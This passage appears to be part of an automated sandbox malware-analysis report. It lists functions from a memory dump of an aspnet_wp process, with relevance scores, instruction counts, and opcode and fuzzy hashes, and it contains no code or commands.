Instruction Fuzzy Hash: A5212531B147499FC720DFA6A844B6BB7EAFFC9314F10492DF8BA83150DB70A9458791

Function 0554D0C0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
Instruction ID: b04647a88136773a0cd075f1a9f9e78ef11014de2038165e0b1a2d977eb0482e
Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
Instruction Fuzzy Hash: F1218072644704ABD321DF198C41B5ABBB5FF89764F10052EF949973A0D734E9018BE9

Function 054F15A9 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
Instruction ID: 84791599db2ea31e8cd563577f33b9d8e4443df0da6437b096a8849521db2377
Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
Instruction Fuzzy Hash: E921F071604685DFEB22CFAAC949FA177EABF40350F1914E2ED4A8B292EB34DC41C750

Function 054CB765 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3bf81c367e18fb567872e64b42333b696707601e8d37982ba02f7765f931ce9
Instruction ID: 6116233baee8b0d0b22925a544999328eb9936cac5c863444e87afe1adf785ca
Opcode Fuzzy Hash: f3bf81c367e18fb567872e64b42333b696707601e8d37982ba02f7765f931ce9
Instruction Fuzzy Hash: 4921B332210A00DFC722EF69C946F9ABBF5FF48705F1449AEE046976A1CB34E944DB54

Function 054D8770 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4c68bedc8df00a7dd98ab73afee2ac20f8ae51dc07677d72ccb23637d6439f5
Instruction ID: 9dcbaf65636e5b7054af3dd18f5379de0ce754f13f8b27f005ba2b85a9681797
Opcode Fuzzy Hash: a4c68bedc8df00a7dd98ab73afee2ac20f8ae51dc07677d72ccb23637d6439f5
Instruction Fuzzy Hash: 5A1163357056119B8B51CF4AC990AB7F7E9BF4A750B1440AEED09AF305D6B1D90187A0

Function 05500124 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction ID: 9a073449944fce068e49c995c30d7256c29407b3296bdcaffbdd37d8edeb59a5
Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction Fuzzy Hash: 2611E273600605BFD7229F54CC48FAABBB9FB80764F100029FA048B1D0D671ED44CB50

Function 054D3720 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aefdba3d721bdf9fad64c3fe78160136495d896e3f60bcd8044a7be4d7b6ef9
Instruction ID: 5511d22032f1fa5dbef83f7b8594ce4811977b378a50581e37a05bddf930b2ad
Opcode Fuzzy Hash: 2aefdba3d721bdf9fad64c3fe78160136495d896e3f60bcd8044a7be4d7b6ef9
Instruction Fuzzy Hash: F721F270A046098BEB15CF6DC0687EEFBB4BB88318F29C45ED812573C0CBB89948C761

Function 054D80E9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f33bec1c3f51cc72cf4cc780dd481ac37171886952a2ce9ae9a77f348f1548
Instruction ID: ef2aa414a36b73d4b2e890e6ae569d242a301c9b1acd4f31ce80f174308715cc
Opcode Fuzzy Hash: 39f33bec1c3f51cc72cf4cc780dd481ac37171886952a2ce9ae9a77f348f1548
Instruction Fuzzy Hash: 19215E75A00205DFCB14CF58C591ABEFBB6FB89318F2441AED105A7354CB71AD0ACBA0

Function 0555D080 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d03a86dfad28a400f26fc5cd66a4249f8bb32eee97e2ff3e000aaf6801b2c32c
Instruction ID: 1f414aa12a102ca3b0fea2115725f484c9a8b1780efbe8436222971aadb4a11c
Opcode Fuzzy Hash: d03a86dfad28a400f26fc5cd66a4249f8bb32eee97e2ff3e000aaf6801b2c32c
Instruction Fuzzy Hash: BF115532210200ABC732AB65CC58F227BB9FF81771F20486EF9045B690DA30E901C790

Function 0550674D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3ed8a366b6db7a195a0ba00da6080f4a999de67e8b7a54445673ba9487de900
Instruction ID: 7211380c94f6b81d67d79c4de12e6a12ed8b732fe9e415591ca8364119eb806f
Opcode Fuzzy Hash: e3ed8a366b6db7a195a0ba00da6080f4a999de67e8b7a54445673ba9487de900
Instruction Fuzzy Hash: C2214A75614A00EFD720CF69C881F76B7F9FF84650F54982DE49AC7290DA70A960CBA0

Function 055066B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382dff8b1c23363f71012641693d7c86f5e9e619ad87bb129a16402e8f72a4d3
Instruction ID: 04584836522b0918bdfdb59f3c89713290b9ab82fff5c9305be39c713d73461e
Opcode Fuzzy Hash: 382dff8b1c23363f71012641693d7c86f5e9e619ad87bb129a16402e8f72a4d3
Instruction Fuzzy Hash: AD112076A00201EFCB25CF59C580E6ABBFAFF84300B05507EE9069B350DA70DD00CB90

Function 0555E7E1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction ID: 6740a9caab024c527c5409f961145c51cd9297617468197eb89166fa7988126a
Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction Fuzzy Hash: AE11C132600604EFD7209F45C866B56B7EAFF42760F0584AFEC099B150D730DE41C790

Function 054F27ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ec44d2d488c3c418d648f55338f009bdf8ca7231021e4c521c6e7e3a12d5292
Instruction ID: 172a0795111c8f3ba4ff27aa3ddace40877fa3219ca4d57e5bfa289a622c7fec
Opcode Fuzzy Hash: 2ec44d2d488c3c418d648f55338f009bdf8ca7231021e4c521c6e7e3a12d5292
Instruction Fuzzy Hash: CF012635309688AFE316E66EEC59FA77B8DFF80350F0904A6F9458B690DA64DC00C3B1

Function 0558D6F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
Instruction ID: ab5e0cf50b49d2b8998b7485831fa327eeac2db5259e896c3d735eba99c7f7ab
Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
Instruction Fuzzy Hash: AD01617670450AFB9B05EAA6D944EAF7BBDFFC5A44F000059A905E3240E770FE01D7A0

Function 054D4690 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f373c076203179c852e55543f7cf2801647ae0b79b76cd1db2cd5478597485a9
Instruction ID: c61df5bf91fa91e43d1a1e2ee71628ce841cd1d834a00a49a827d7384c198095
Opcode Fuzzy Hash: f373c076203179c852e55543f7cf2801647ae0b79b76cd1db2cd5478597485a9
Instruction Fuzzy Hash: 8D118C36304644AFCF65CB99D854F96BBA5EB86A64F10415BF8058B690C7B0E840CF70

Function 054FB052 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a54b0afa013fb1a843002431bd8d3c21c66c68201b332d2161e7cc03aa337a34
Instruction ID: 16b1ae0989cffcbb1ad3d260c8726e82a748d2b4e90230e60853b039f7e1ecbe
Opcode Fuzzy Hash: a54b0afa013fb1a843002431bd8d3c21c66c68201b332d2161e7cc03aa337a34
Instruction Fuzzy Hash: FF0196B6B043006FD721ABAEDC85FABB7E9EF85614F04046AE70697241E674E9018761

Function 05506620 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 902dafe566dea715a18b0ca74b160ecc3381501ca485c56b1401ccc42fd16049
Instruction ID: a3f86dfa61f0fd5d1655bdfd4f0035bfd47563518ef2927a07d37dd6fb0db980
Opcode Fuzzy Hash: 902dafe566dea715a18b0ca74b160ecc3381501ca485c56b1401ccc42fd16049
Instruction Fuzzy Hash: C1118276A00715ABCB22DF59D980B9EF7B8FF84741F640459D906A7240DB30FD118B60

Function 054FE53E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction ID: 70037c68a13c813be22bc0d7f40991861de2ec863c5dbad5240bf902094a6b62
Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction Fuzzy Hash: F1112572A056C59FE722CBA8C848FA53799BF00749F0904E2DE0587B91F32CD852C350

Function 0555E75D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction ID: d5aa08ce2c3b1994db74208b2ebf3a39745db7239843e82b301cffd97b92e184
Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction Fuzzy Hash: B7012632714545AFD7219F24C916F9AB6ADFF80760F0584AAEC09AB160D771DE40C790

Function 0554E1D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec97bc42ca9bdf63d94697fac3ad7090bc7a492d5b217f64fb33cbeeaf2b37e4
Instruction ID: 8e71ba12043fa4799921f84cc6e03fd69d0531479f64d1f9baf9b1747541c272
Opcode Fuzzy Hash: ec97bc42ca9bdf63d94697fac3ad7090bc7a492d5b217f64fb33cbeeaf2b37e4
Instruction Fuzzy Hash: 7011A132241640EFCB15EF59CD95F56BBB8FF44B44F2404A9F9059B651C235ED01CAA0

Function 05566500 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73dc0345e9268721a49e610e5be9d5d3e674ddef06f223faf2844f0935116f1
Instruction ID: 2de4055a0b5dbb2fa689d7c2b4a76ed61111894d3d1d281bde2956273196e6fb
Opcode Fuzzy Hash: a73dc0345e9268721a49e610e5be9d5d3e674ddef06f223faf2844f0935116f1
Instruction Fuzzy Hash: 5D11C4326441859FC710CF69D841BA6FBBAFFAA314F488159E849CB315D732EC84CBA1

Function 05556050 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b1ce68f542443f0622afdd1f3f798356922857b3310e9878be74159f521b131
Instruction ID: 5cedd275b1c4643e62a9d691151cf3fab47800488b0c4e35abfea49676bb2a05
Opcode Fuzzy Hash: 7b1ce68f542443f0622afdd1f3f798356922857b3310e9878be74159f521b131
Instruction Fuzzy Hash: BC111772900119ABCB11DB94CC94DEFBBBDFF48358F044166A906A7210EA34AA54CBE0

Function 054D208A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction ID: 71140f61cc498c9be42024c992ab5553f91cb81068138a39ab9dc3a934e0aee0
Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction Fuzzy Hash: 8C0124366081109BDF128E29D890FE7B7B7BFC4700F1545AAEE068F285DAB1D881C7A0

Function 0550E5CF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbcf102190c078b61e04e09186c7804b931030bc9f1091278e4b339c6bb395d7
Instruction ID: b4a3a39d81c1e02b33615aaa14943016c47ff1221c679f8cbb32c30e7b707064
Opcode Fuzzy Hash: fbcf102190c078b61e04e09186c7804b931030bc9f1091278e4b339c6bb395d7
Instruction Fuzzy Hash: 38018472305650BFC211AB6ACD84E97B7BCFF846557000A6EB10593551DBA4EC01CAE0

Function 054CC020 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction ID: 5dcd509d03486b461ad3f5b44016cd8d94be69b313677476226474274463a790
Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction Fuzzy Hash: A401DD32300B459FDB22D6A6C444EE777FAFFC6214F05485EA55687580DAB0F802CB50

Function 055120F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a19dd8623c8ac6c0393ad5c382331c27bf7e57b7b6e59714302163309cdb7411
Instruction ID: c681bc8d128cbb8ef9bfad7397d55dbc76b2371ca21e0a40ee5573505771daf4
Opcode Fuzzy Hash: a19dd8623c8ac6c0393ad5c382331c27bf7e57b7b6e59714302163309cdb7411
Instruction Fuzzy Hash: D3118775A0020DABEB01EFA4C855EAE7BBABB84354F004059ED019B280DB34AE01CB90

Function 0555C460 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b85c3b6d530a80dd1cb8c31a6dafb5a5addc37a9a19411abfddd72f875aaa085
Instruction ID: 77c378d193ca563c68758c19b16c10bab28e35e1fab06496fb5a8a83e1b195f9
Opcode Fuzzy Hash: b85c3b6d530a80dd1cb8c31a6dafb5a5addc37a9a19411abfddd72f875aaa085
Instruction Fuzzy Hash: 3F115B75A0024DEBDF06EF64C855EAE7BB5FB88354F00405ABC0197340DA35ED11CB90

Function 0558F5BE Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f88b3f30e288ddf8601deb5a2e604945c38517bb4175ed040588488aca8b66
Instruction ID: 53c00f9c20f17dcf519ea5ac2a57ef38069f6c5c518d5d5a3f6202a15b60b34f
Opcode Fuzzy Hash: 36f88b3f30e288ddf8601deb5a2e604945c38517bb4175ed040588488aca8b66
Instruction Fuzzy Hash: 33017571A10249EFDB04EF69D855FAEBBB8FF44710F404456B900EB280DA74EA41CB94

Function 0558F453 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a7380f4213ff5ca729af20cc2ae5e702535877871821e4f45458f46a571c1c
Instruction ID: 637e955891f05924605daf8be8374092b74147fe59e24baef1d5d53bdd80577a
Opcode Fuzzy Hash: 10a7380f4213ff5ca729af20cc2ae5e702535877871821e4f45458f46a571c1c
Instruction Fuzzy Hash: 55017571A10249AFDB04EF69D855FAEBBB8FF84710F404056B900EB391DA74EA01C794

Function 0550D1D0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
Instruction ID: 89387c58b0e22d14ce8237b822d56ea536d0319e4129ded9115d18cd0171ad2f
Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
Instruction Fuzzy Hash: 2C01F2B2B05106ABDB11DAD4E804F7973BAFBC4A24F14A15AFE158B2C0DB74D901CBD1

Function 054EE016 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction ID: 0f7244543fced1ede3ddec6bd931e80fffa6c6fb4a5ddab1b3b25a9ba5c32773
Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction Fuzzy Hash: 64017C322045949FD323C71DC948FB677EDFB45B51F0904A2E806CB7E1D628DD81C661

Function 054D2582 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629f8504f95b7ee03981c88d5148c51cfb002be00a55189a9e8240966746576b
Instruction ID: 3776f16fc78b95076b7a0c4164cf83a1a9c416ab0e653811a7480bc78341f8e6
Opcode Fuzzy Hash: 629f8504f95b7ee03981c88d5148c51cfb002be00a55189a9e8240966746576b
Instruction Fuzzy Hash: FCF0F432745B20B7C732DF568C64F97BAAAEF84B90F10442AE506A7640CA70ED01DBB0

Function 0559972B Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94

Function 055A5636 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1124d91d0c274e2e7f393105db5c693d76d016fc4838708bd37948d7f5385dda
Instruction ID: 77c364c3cd7702960f661095abd8adbb49ea5b20b9f2a95bc5d6f2e82afe55b0
Opcode Fuzzy Hash: 1124d91d0c274e2e7f393105db5c693d76d016fc4838708bd37948d7f5385dda
Instruction Fuzzy Hash: 69115B75A10249EBDB04DFA9D445A9EBBB4FF48704F10845AA815EB341E634EA02CB94

Function 055A5537 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ce0cc6213ab1ece71a99aabfdb22e9dd9813b5cc755ed02fa2645046d3793
Instruction ID: 78b34893c0a9130840e28a413dd9e6b2bdb1fb27b22cf52f83f4c2bbede85728
Opcode Fuzzy Hash: 892ce0cc6213ab1ece71a99aabfdb22e9dd9813b5cc755ed02fa2645046d3793
Instruction Fuzzy Hash: 24111BB1A1024ADFDB04DFA9D545BADBBF4BF48300F0442AAE509EB382E634D941CB94

Function 05505734 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
Instruction ID: f2e2e835afa6b950c3d9c3f4fce2360f5b1baa8be288baecaab35e25f6163876
Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
Instruction Fuzzy Hash: 3BF0FF72A05214AFE319CF5CC980FBAB7EDEB45690F05406AD501DB270E671EE04CAA4

Function 055A5152 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179c6dcbc5de0664ebf1f188b7118d46f731ee307a77e9f6bcf5d7ea8759fc9a
Instruction ID: f28f855d3617103d73cd0282efa68657f3dc772a965b4f604e76f99b448478ed
Opcode Fuzzy Hash: 179c6dcbc5de0664ebf1f188b7118d46f731ee307a77e9f6bcf5d7ea8759fc9a
Instruction Fuzzy Hash: 9B011E71A102099BDB00DF69D955DEEBBB8FF48714F10445AE901E7240E634AA018BA4

Function 055A5060 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 196e18465c37989c285e326d065d8e899118bdf0db85cfdb877dd3b234b8c09d
Instruction ID: bb6f32b37fbeb0fc1689d795fd44f5b612f43b079c9e9ebc0be2f010a6ddd3bb
Opcode Fuzzy Hash: 196e18465c37989c285e326d065d8e899118bdf0db85cfdb877dd3b234b8c09d
Instruction Fuzzy Hash: 57011AB5A11209ABDB04DFA9D945DEEBBB8FF48714F10445AF901E7341D634AA018BA4

Function 054FC073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

